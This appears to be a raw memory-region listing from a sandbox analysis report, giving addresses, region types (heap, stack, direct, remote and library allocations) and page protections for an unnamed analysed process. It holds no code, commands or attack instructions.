7A98000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2734000
|
system
|
page read and write
|
||
|
7A41000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
9C28000
|
direct allocation
|
page execute and read and write
|
||
|
4FFF000
|
system
|
page execute and read and write
|
||
|
98E000
|
stack
|
page read and write
|
||
|
291D000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
B11000
|
unkown
|
page readonly
|
||
|
3175000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7F70000
|
heap
|
page read and write
|
||
|
4B92000
|
direct allocation
|
page execute and read and write
|
||
|
7AA5000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
276C000
|
stack
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
BA7583E000
|
stack
|
page read and write
|
||
|
4F1A000
|
stack
|
page read and write
|
||
|
74E1000
|
heap
|
page read and write
|
||
|
2F2D000
|
stack
|
page read and write
|
||
|
AB1000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2BABAC6B000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
4A49000
|
trusted library allocation
|
page read and write
|
||
|
7A25000
|
heap
|
page read and write
|
||
|
8631000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0C1628000
|
heap
|
page read and write
|
||
|
BB0000
|
unkown
|
page read and write
|
||
|
6EFB000
|
stack
|
page read and write
|
||
|
8820000
|
trusted library allocation
|
page read and write
|
||
|
548000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7EE90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
AA0000
|
unkown
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
7A04000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0AAF53000
|
trusted library allocation
|
page read and write
|
||
|
53EE000
|
stack
|
page read and write
|
||
|
560B000
|
stack
|
page read and write
|
||
|
4868000
|
trusted library allocation
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
32EF000
|
stack
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
2C57000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
2DFE000
|
stack
|
page read and write
|
||
|
472C000
|
stack
|
page read and write
|
||
|
2BABAD60000
|
heap
|
page read and write
|
||
|
B60000
|
unkown
|
page read and write
|
||
|
9C0000
|
unkown
|
page readonly
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
48E0000
|
heap
|
page read and write
|
||
|
49EE000
|
direct allocation
|
page execute and read and write
|
||
|
5B0000
|
unkown
|
page readonly
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C59000
|
heap
|
page read and write
|
||
|
AEE000
|
stack
|
page read and write
|
||
|
788B000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
6DEE000
|
stack
|
page read and write
|
||
|
1C0A9D7F000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8095000
|
heap
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
8611000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
1C0C1673000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
96C000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
5901000
|
trusted library allocation
|
page read and write
|
||
|
1C0A9AA0000
|
trusted library allocation
|
page read and write
|
||
|
263E000
|
stack
|
page read and write
|
||
|
23840000
|
heap
|
page read and write
|
||
|
1C0A9D43000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C0A8EF0000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7A62000
|
heap
|
page read and write
|
||
|
8639000
|
heap
|
page read and write
|
||
|
7FAD000
|
stack
|
page read and write
|
||
|
1C0AB4D8000
|
trusted library allocation
|
page read and write
|
||
|
1C0A74C3000
|
heap
|
page read and write
|
||
|
3159000
|
heap
|
page read and write
|
||
|
507C000
|
system
|
page execute and read and write
|
||
|
7A5B000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
2660000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
13EFE340000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
4EDB000
|
stack
|
page read and write
|
||
|
497D000
|
direct allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2862000
|
unkown
|
page read and write
|
||
|
83A000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
590000
|
unkown
|
page readonly
|
||
|
2CD0000
|
direct allocation
|
page read and write
|
||
|
50B000
|
stack
|
page read and write
|
||
|
2A78000
|
heap
|
page read and write
|
||
|
7FB2000
|
heap
|
page read and write
|
||
|
BA752FE000
|
stack
|
page read and write
|
||
|
82D0000
|
heap
|
page read and write
|
||
|
90E000
|
stack
|
page read and write
|
||
|
47EB000
|
stack
|
page read and write
|
||
|
CE28000
|
direct allocation
|
page execute and read and write
|
||
|
2B3C000
|
unkown
|
page read and write
|
||
|
4FD8000
|
remote allocation
|
page execute and read and write
|
||
|
96C000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
23840000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
7FE6000
|
heap
|
page read and write
|
||
|
7FE1000
|
heap
|
page read and write
|
||
|
2360E000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FDB000
|
heap
|
page read and write
|
||
|
446EBFC000
|
stack
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
4E2F000
|
stack
|
page read and write
|
||
|
9C0000
|
unkown
|
page readonly
|
||
|
1C0AB31B000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
18843FC4000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
560E000
|
stack
|
page read and write
|
||
|
23B1B000
|
heap
|
page read and write
|
||
|
4795000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ABC000
|
heap
|
page read and write
|
||
|
2B3C000
|
unkown
|
page read and write
|
||
|
2CFF000
|
heap
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
7FD7000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
85EC000
|
stack
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
13EFE498000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
7FE7000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0C15CF000
|
heap
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
2F24000
|
unkown
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
561000
|
unkown
|
page execute read
|
||
|
1C0AAF4D000
|
trusted library allocation
|
page read and write
|
||
|
81C0000
|
direct allocation
|
page read and write
|
||
|
79F4000
|
heap
|
page read and write
|
||
|
83A000
|
stack
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2AC6000
|
heap
|
page read and write
|
||
|
54AE000
|
stack
|
page read and write
|
||
|
2CE6000
|
heap
|
page read and write
|
||
|
4E60000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
4DDE000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
1C0C1590000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4C7F000
|
stack
|
page read and write
|
||
|
7FFA000
|
heap
|
page read and write
|
||
|
7A6D000
|
heap
|
page read and write
|
||
|
48FE000
|
stack
|
page read and write
|
||
|
1C0C17C4000
|
heap
|
page read and write
|
||
|
2358E000
|
stack
|
page read and write
|
||
|
8625000
|
heap
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
3039000
|
stack
|
page read and write
|
||
|
18843FCE000
|
trusted library allocation
|
page read and write
|
||
|
B00000
|
unkown
|
page read and write
|
||
|
47AA000
|
stack
|
page read and write
|
||
|
23EE2000
|
direct allocation
|
page execute and read and write
|
||
|
7FEE000
|
stack
|
page read and write
|
||
|
47AE000
|
stack
|
page read and write
|
||
|
BA7640E000
|
stack
|
page read and write
|
||
|
2AC4000
|
heap
|
page read and write
|
||
|
7A9D000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
C0E000
|
heap
|
page read and write
|
||
|
234C000
|
system
|
page read and write
|
||
|
8230000
|
direct allocation
|
page read and write
|
||
|
2C7A000
|
heap
|
page read and write
|
||
|
13EFE490000
|
heap
|
page read and write
|
||
|
BE7000
|
heap
|
page read and write
|
||
|
F022DFF000
|
stack
|
page read and write
|
||
|
81F0000
|
direct allocation
|
page read and write
|
||
|
8678000
|
heap
|
page read and write
|
||
|
2CBF000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
239F2000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
77D8000
|
remote allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A744E000
|
heap
|
page read and write
|
||
|
188422F7000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
2D23000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FC3000
|
heap
|
page read and write
|
||
|
1C0AB4DE000
|
trusted library allocation
|
page read and write
|
||
|
7A3C000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
2D63000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
unkown
|
page readonly
|
||
|
1C0A99BF000
|
trusted library allocation
|
page read and write
|
||
|
7FD3000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7A18000
|
heap
|
page read and write
|
||
|
BA7650A000
|
stack
|
page read and write
|
||
|
7A13000
|
heap
|
page read and write
|
||
|
7A46000
|
heap
|
page read and write
|
||
|
1C0AB2CD000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A9E63000
|
trusted library allocation
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
237FB000
|
stack
|
page read and write
|
||
|
86A000
|
stack
|
page read and write
|
||
|
770E000
|
stack
|
page read and write
|
||
|
6CEE000
|
stack
|
page read and write
|
||
|
1C0C15A1000
|
heap
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
6F00000
|
direct allocation
|
page read and write
|
||
|
2BABB010000
|
heap
|
page read and write
|
||
|
9050000
|
direct allocation
|
page execute and read and write
|
||
|
7FC3000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
1C0A9E3B000
|
trusted library allocation
|
page read and write
|
||
|
2600000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2604000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
23E6D000
|
direct allocation
|
page execute and read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
4F87000
|
trusted library allocation
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
79EF000
|
heap
|
page read and write
|
||
|
1C0A9060000
|
heap
|
page execute and read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7280000
|
heap
|
page read and write
|
||
|
1C0C15C6000
|
heap
|
page read and write
|
||
|
7F78000
|
heap
|
page read and write
|
||
|
1C0A8EB0000
|
heap
|
page readonly
|
||
|
1C0A9130000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
13EFE760000
|
heap
|
page read and write
|
||
|
18843E17000
|
trusted library allocation
|
page read and write
|
||
|
7AAC000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
469C000
|
heap
|
page read and write
|
||
|
4979000
|
direct allocation
|
page execute and read and write
|
||
|
7FFA000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FE0000
|
heap
|
page read and write
|
||
|
1C0A74E0000
|
heap
|
page read and write
|
||
|
88B0000
|
direct allocation
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BA7638F000
|
stack
|
page read and write
|
||
|
1C0C18A7000
|
heap
|
page read and write
|
||
|
4BA2000
|
unclassified section
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A73D0000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2CA1000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2D12000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
53AF000
|
stack
|
page read and write
|
||
|
47D0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
3BD8000
|
remote allocation
|
page execute and read and write
|
||
|
8870000
|
direct allocation
|
page read and write
|
||
|
485F000
|
stack
|
page read and write
|
||
|
4779000
|
trusted library allocation
|
page read and write
|
||
|
577000
|
unkown
|
page readonly
|
||
|
2664E000
|
unclassified section
|
page execute and read and write
|
||
|
8080000
|
heap
|
page readonly
|
||
|
7482000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
23B1F000
|
heap
|
page read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
BD7000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C0AAF41000
|
trusted library allocation
|
page read and write
|
||
|
1C0C15E3000
|
heap
|
page read and write
|
||
|
560000
|
unkown
|
page readonly
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
23841000
|
heap
|
page read and write
|
||
|
2CAF000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BA755BE000
|
stack
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0AB4F2000
|
trusted library allocation
|
page read and write
|
||
|
59D8000
|
remote allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
B50000
|
unkown
|
page read and write
|
||
|
7AA1000
|
heap
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
1C0A745D000
|
heap
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
1C0A8DD0000
|
heap
|
page read and write
|
||
|
13EFE420000
|
heap
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
7FD7000
|
heap
|
page read and write
|
||
|
73E0000
|
heap
|
page read and write
|
||
|
2DAD000
|
stack
|
page read and write
|
||
|
BA7547E000
|
stack
|
page read and write
|
||
|
48D0000
|
trusted library allocation
|
page read and write
|
||
|
1C0A7474000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1171000
|
unkown
|
page readonly
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
575000
|
unkown
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
248F0000
|
unclassified section
|
page execute and read and write
|
||
|
B20000
|
unkown
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
8360000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A75F0000
|
heap
|
page read and write
|
||
|
6F60000
|
direct allocation
|
page read and write
|
||
|
575000
|
unkown
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8260000
|
direct allocation
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
2BABB015000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0C17E1000
|
heap
|
page read and write
|
||
|
6D6E000
|
stack
|
page read and write
|
||
|
9B0000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
1C0C1669000
|
heap
|
page read and write
|
||
|
2770000
|
heap
|
page read and write
|
||
|
2383C000
|
stack
|
page read and write
|
||
|
1C0C17D1000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
47EF000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page read and write
|
||
|
7A68000
|
heap
|
page read and write
|
||
|
1161000
|
unkown
|
page readonly
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D54000
|
heap
|
page read and write
|
||
|
47B0000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
2D3C000
|
heap
|
page read and write
|
||
|
1C0A9E55000
|
trusted library allocation
|
page read and write
|
||
|
18843E0E000
|
trusted library allocation
|
page read and write
|
||
|
297C000
|
unkown
|
page read and write
|
||
|
2CD0000
|
direct allocation
|
page read and write
|
||
|
23E71000
|
direct allocation
|
page execute and read and write
|
||
|
8210000
|
direct allocation
|
page read and write
|
||
|
960000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
188422F0000
|
heap
|
page read and write
|
||
|
297C000
|
stack
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
1161000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
C428000
|
direct allocation
|
page execute and read and write
|
||
|
1C0C17CD000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
483A000
|
heap
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
3144000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
188420E0000
|
system
|
page execute and read and write
|
||
|
5A0000
|
unkown
|
page readonly
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
AC0000
|
unkown
|
page read and write
|
||
|
7AC6000
|
heap
|
page read and write
|
||
|
8300000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1C0A9481000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
486E000
|
stack
|
page read and write
|
||
|
5025000
|
system
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
73D0000
|
heap
|
page read and write
|
||
|
44EF000
|
unkown
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
13EFFEA0000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A8EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1C0A9E1A000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
6F40000
|
direct allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BA74EF6000
|
stack
|
page read and write
|
||
|
6DD8000
|
remote allocation
|
page execute and read and write
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
73B0000
|
heap
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BE7000
|
heap
|
page read and write
|
||
|
8240000
|
direct allocation
|
page read and write
|
||
|
8340000
|
trusted library allocation
|
page read and write
|
||
|
44703FE000
|
stack
|
page read and write
|
||
|
18842290000
|
heap
|
page read and write
|
||
|
476B000
|
stack
|
page read and write
|
||
|
950000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
30C1000
|
heap
|
page read and write
|
||
|
B20000
|
unkown
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1C0A8EC0000
|
trusted library allocation
|
page read and write
|
||
|
8090000
|
heap
|
page read and write
|
||
|
9A0000
|
unkown
|
page readonly
|
||
|
73F0000
|
heap
|
page read and write
|
||
|
85AD000
|
stack
|
page read and write
|
||
|
768E000
|
stack
|
page read and write
|
||
|
48AF000
|
stack
|
page read and write
|
||
|
BA753FE000
|
stack
|
page read and write
|
||
|
5B0000
|
unkown
|
page readonly
|
||
|
7FE1000
|
heap
|
page read and write
|
||
|
494C000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
79F2000
|
heap
|
page read and write
|
||
|
23BA0000
|
direct allocation
|
page execute and read and write
|
||
|
8230000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
23CCD000
|
direct allocation
|
page execute and read and write
|
||
|
76CE000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8200000
|
direct allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
546C000
|
stack
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
2800000
|
unkown
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
18843E21000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
856C000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
960000
|
unkown
|
page readonly
|
||
|
560000
|
unkown
|
page readonly
|
||
|
4F9F000
|
trusted library allocation
|
page read and write
|
||
|
7FBE000
|
heap
|
page read and write
|
||
|
7FE7000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
25F6EAC000
|
stack
|
page read and write
|
||
|
8890000
|
direct allocation
|
page read and write
|
||
|
570F000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
47C5000
|
heap
|
page read and write
|
||
|
1C0A7481000
|
heap
|
page read and write
|
||
|
7432000
|
heap
|
page read and write
|
||
|
1C0AAC6A000
|
trusted library allocation
|
page read and write
|
||
|
87F0000
|
trusted library allocation
|
page read and write
|
||
|
1C0A9E29000
|
trusted library allocation
|
page read and write
|
||
|
81B0000
|
direct allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7A95000
|
heap
|
page read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
1884211F000
|
system
|
page execute and read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
AD0000
|
heap
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
7490000
|
heap
|
page read and write
|
||
|
44E1000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
82FE000
|
stack
|
page read and write
|
||
|
2D36000
|
heap
|
page read and write
|
||
|
481E000
|
stack
|
page read and write
|
||
|
1C0C18C1000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7A36000
|
heap
|
page read and write
|
||
|
3200000
|
unkown
|
page execute and read and write
|
||
|
1C0A9E5F000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2C62000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
6F50000
|
direct allocation
|
page read and write
|
||
|
2373D000
|
stack
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
BA759BB000
|
stack
|
page read and write
|
||
|
970000
|
unkown
|
page readonly
|
||
|
8800000
|
trusted library allocation
|
page read and write
|
||
|
1C0C15D9000
|
heap
|
page read and write
|
||
|
707B000
|
stack
|
page read and write
|
||
|
2132000
|
system
|
page read and write
|
||
|
58F1000
|
trusted library allocation
|
page read and write
|
||
|
561000
|
unkown
|
page execute read
|
||
|
8240000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8621000
|
heap
|
page read and write
|
||
|
2BABAC60000
|
heap
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
5919000
|
trusted library allocation
|
page read and write
|
||
|
1884231B000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7F5E000
|
stack
|
page read and write
|
||
|
590000
|
unkown
|
page readonly
|
||
|
1C0A7479000
|
heap
|
page read and write
|
||
|
B028000
|
direct allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
482E000
|
stack
|
page read and write
|
||
|
BA7593E000
|
stack
|
page read and write
|
||
|
13EFE440000
|
heap
|
page read and write
|
||
|
1C0AAF57000
|
trusted library allocation
|
page read and write
|
||
|
82BE000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
852C000
|
stack
|
page read and write
|
||
|
1C0C159A000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
47C0000
|
heap
|
page readonly
|
||
|
313F000
|
stack
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
A10000
|
trusted library allocation
|
page read and write
|
||
|
29B8000
|
stack
|
page read and write
|
||
|
3000000
|
remote allocation
|
page execute and read and write
|
||
|
802E000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
18843F01000
|
trusted library allocation
|
page read and write
|
||
|
BA7658B000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
3078000
|
heap
|
page read and write
|
||
|
7F6F000
|
stack
|
page read and write
|
||
|
32AE000
|
stack
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
478A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C0A8F30000
|
trusted library allocation
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
7FDC000
|
heap
|
page read and write
|
||
|
7421000
|
heap
|
page read and write
|
||
|
27A5000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
446F3FD000
|
stack
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
18843E00000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
1C0B9490000
|
trusted library allocation
|
page read and write
|
||
|
B00000
|
unkown
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
